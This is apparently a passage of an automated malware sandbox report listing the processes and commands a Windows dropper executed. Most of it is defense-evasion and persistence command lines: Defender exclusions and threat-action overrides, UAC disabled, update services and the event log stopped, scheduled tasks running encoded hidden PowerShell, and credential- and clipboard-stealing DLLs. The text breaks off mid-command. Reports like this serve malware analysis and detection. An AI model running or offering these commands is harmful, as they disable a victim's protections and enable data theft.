| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Pictures\YcZF7SNXvFMc37DYXI3ziUaW.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\08b8633507bbabd427439f1fb9ce13335c1eb082aa9f9d02b3331020e854a856.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe | N/A |
Suspicious use of UnmapMainImage
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of WriteProcessMemory
System policy modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\08b8633507bbabd427439f1fb9ce13335c1eb082aa9f9d02b3331020e854a856.exe | N/A |
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\08b8633507bbabd427439f1fb9ce13335c1eb082aa9f9d02b3331020e854a856.exe
"C:\Users\Admin\AppData\Local\Temp\08b8633507bbabd427439f1fb9ce13335c1eb082aa9f9d02b3331020e854a856.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\08b8633507bbabd427439f1fb9ce13335c1eb082aa9f9d02b3331020e854a856.exe" -Force
C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
C:\Users\Admin\Pictures\IglGrnQY4KjxY4ESkNLr1P49.exe
"C:\Users\Admin\Pictures\IglGrnQY4KjxY4ESkNLr1P49.exe"
C:\Users\Admin\Pictures\YcZF7SNXvFMc37DYXI3ziUaW.exe
"C:\Users\Admin\Pictures\YcZF7SNXvFMc37DYXI3ziUaW.exe"
C:\Users\Admin\AppData\Local\Temp\is-7K59T.tmp\IglGrnQY4KjxY4ESkNLr1P49.tmp
"C:\Users\Admin\AppData\Local\Temp\is-7K59T.tmp\IglGrnQY4KjxY4ESkNLr1P49.tmp" /SL5="$C01D8,1511216,54272,C:\Users\Admin\Pictures\IglGrnQY4KjxY4ESkNLr1P49.exe"
C:\Users\Admin\Pictures\MjaQmNnsQNMq8m3PWjNhbwcJ.exe
"C:\Users\Admin\Pictures\MjaQmNnsQNMq8m3PWjNhbwcJ.exe"
C:\Users\Admin\AppData\Local\Temp\syncUpd.exe
C:\Users\Admin\AppData\Local\Temp\syncUpd.exe
C:\Users\Admin\AppData\Local\Lina Text\linatext.exe
"C:\Users\Admin\AppData\Local\Lina Text\linatext.exe" -i
C:\Users\Admin\AppData\Local\Lina Text\linatext.exe
"C:\Users\Admin\AppData\Local\Lina Text\linatext.exe" -s
C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Temp\Task.bat" "
C:\Windows\SysWOW64\chcp.com
chcp 1251
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\Admin\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F
C:\Users\Admin\Pictures\HaHE4yGhKaVOdJY4tH9U0wE2.exe
"C:\Users\Admin\Pictures\HaHE4yGhKaVOdJY4tH9U0wE2.exe"
C:\Users\Admin\Pictures\mqJpRwpbfK974CI6kSx5DDx3.exe
"C:\Users\Admin\Pictures\mqJpRwpbfK974CI6kSx5DDx3.exe"
C:\Users\Admin\Pictures\POWMHemIAdhWqbG9WwO5wEor.exe
"C:\Users\Admin\Pictures\POWMHemIAdhWqbG9WwO5wEor.exe"
C:\Users\Admin\Pictures\UzSZFMWFpthvMvdZfvnxrxs2.exe
"C:\Users\Admin\Pictures\UzSZFMWFpthvMvdZfvnxrxs2.exe" --silent --allusers=0
C:\Users\Admin\Pictures\UzSZFMWFpthvMvdZfvnxrxs2.exe
C:\Users\Admin\Pictures\UzSZFMWFpthvMvdZfvnxrxs2.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=108.0.5067.29 --initial-client-data=0x2e8,0x2ec,0x2f0,0x2e4,0x2f4,0x6f1821f8,0x6f182204,0x6f182210
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\UzSZFMWFpthvMvdZfvnxrxs2.exe
"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\UzSZFMWFpthvMvdZfvnxrxs2.exe" --version
C:\Users\Admin\AppData\Local\Temp\7zS86E3.tmp\Install.exe
.\Install.exe
C:\Users\Admin\Pictures\UzSZFMWFpthvMvdZfvnxrxs2.exe
"C:\Users\Admin\Pictures\UzSZFMWFpthvMvdZfvnxrxs2.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=4268 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20240315020143" --session-guid=400773cf-74a5-42b2-bfbf-cf7b684569cd --server-tracking-blob=MDcwYmE3NWEzZjFjNDM1NjgyOGY5NGNkZDcxNzdiNGQyOTJkNTVhNjJlYjRkM2YwODM3MGU4MTc0MzY1NTk4NDp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2NyIsInN5c3RlbSI6eyJwbGF0Zm9ybSI6eyJhcmNoIjoieDg2XzY0Iiwib3BzeXMiOiJXaW5kb3dzIiwib3BzeXMtdmVyc2lvbiI6IjEwIiwicGFja2FnZSI6IkVYRSJ9fSwidGltZXN0YW1wIjoiMTcxMDQ2ODA4OS4zNjIzIiwidXRtIjp7ImNhbXBhaWduIjoiNzY3IiwibWVkaXVtIjoiYXBiIiwic291cmNlIjoibWt0In0sInV1aWQiOiJlZTU3OTEzOC04MGVjLTQ3NjEtYjRiMy04ZWU3YjVjMjhmY2EifQ== --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=0405000000000000
C:\Users\Admin\Pictures\UzSZFMWFpthvMvdZfvnxrxs2.exe
C:\Users\Admin\Pictures\UzSZFMWFpthvMvdZfvnxrxs2.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=108.0.5067.29 --initial-client-data=0x2fc,0x300,0x304,0x2cc,0x308,0x6e6121f8,0x6e612204,0x6e612210
C:\Users\Admin\AppData\Local\Temp\7zS8CBF.tmp\Install.exe
.\Install.exe /QnjvBdidv "385118" /S
C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gkcnbQSJR" /SC once /ST 01:09:33 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gkcnbQSJR"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineQC"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop eventlog
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineQC"
C:\ProgramData\Google\Chrome\updater.exe
C:\ProgramData\Google\Chrome\updater.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\C3AE.bat" "
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
C:\Windows\system32\conhost.exe
C:\Windows\system32\conhost.exe
C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1
C:\Windows\explorer.exe
explorer.exe
C:\Users\Admin\AppData\Local\Temp\33945c4f34\Dctooux.exe
C:\Users\Admin\AppData\Local\Temp\33945c4f34\Dctooux.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Local\Temp\GDGIJECGDG.exe"
C:\Users\Admin\AppData\Local\Temp\GDGIJECGDG.exe
"C:\Users\Admin\AppData\Local\Temp\GDGIJECGDG.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C ping 2.2.2.2 -n 1 -w 3000 > Nul & Del C:\Users\Admin\AppData\Local\Temp\GDGIJECGDG.exe
C:\Windows\SysWOW64\PING.EXE
ping 2.2.2.2 -n 1 -w 3000
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gkcnbQSJR"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bnTqljwkAIckBwCXiX" /SC once /ST 02:03:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\VcIJRFpHiPTKASLFH\cTmyoaxliqPIUed\BZzGTBs.exe\" tC /pnsite_idROA 385118 /S" /V1 /F
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403150201431\assistant\Assistant_108.0.5067.20_Setup.exe_sfx.exe
"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403150201431\assistant\Assistant_108.0.5067.20_Setup.exe_sfx.exe"
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a967e0f403b652\cred64.dll, Main
C:\Windows\system32\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a967e0f403b652\cred64.dll, Main
C:\Windows\system32\netsh.exe
netsh wlan show profiles
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403150201431\assistant\assistant_installer.exe
"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403150201431\assistant\assistant_installer.exe" --version
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403150201431\assistant\assistant_installer.exe
"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403150201431\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=108.0.5067.20 --initial-client-data=0x26c,0x270,0x274,0x248,0x278,0xe70040,0xe7004c,0xe70058
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\757987694264_Desktop.zip' -CompressionLevel Optimal
C:\Users\Admin\AppData\Local\Temp\1346.exe
C:\Users\Admin\AppData\Local\Temp\1346.exe
C:\Users\Admin\AppData\Local\Temp\1346.exe
C:\Users\Admin\AppData\Local\Temp\1346.exe
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a967e0f403b652\clip64.dll, Main
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Users\Admin\AppData\Local\a0e81e80-45cc-4456-972b-e9d648d8e4bd" /deny *S-1-1-0:(OI)(CI)(DE,DC)
C:\Users\Admin\AppData\Local\Temp\313E.exe
C:\Users\Admin\AppData\Local\Temp\313E.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 3940 -ip 3940
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3940 -s 1184
C:\Users\Admin\AppData\Local\Temp\1346.exe
"C:\Users\Admin\AppData\Local\Temp\1346.exe" --Admin IsNotAutoStart IsNotTask
C:\Users\Admin\AppData\Local\Temp\1346.exe
"C:\Users\Admin\AppData\Local\Temp\1346.exe" --Admin IsNotAutoStart IsNotTask
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3216 -ip 3216
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3216 -s 572
C:\Users\Admin\AppData\Local\Temp\VcIJRFpHiPTKASLFH\cTmyoaxliqPIUed\BZzGTBs.exe
C:\Users\Admin\AppData\Local\Temp\VcIJRFpHiPTKASLFH\cTmyoaxliqPIUed\BZzGTBs.exe tC /pnsite_idROA 385118 /S
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t 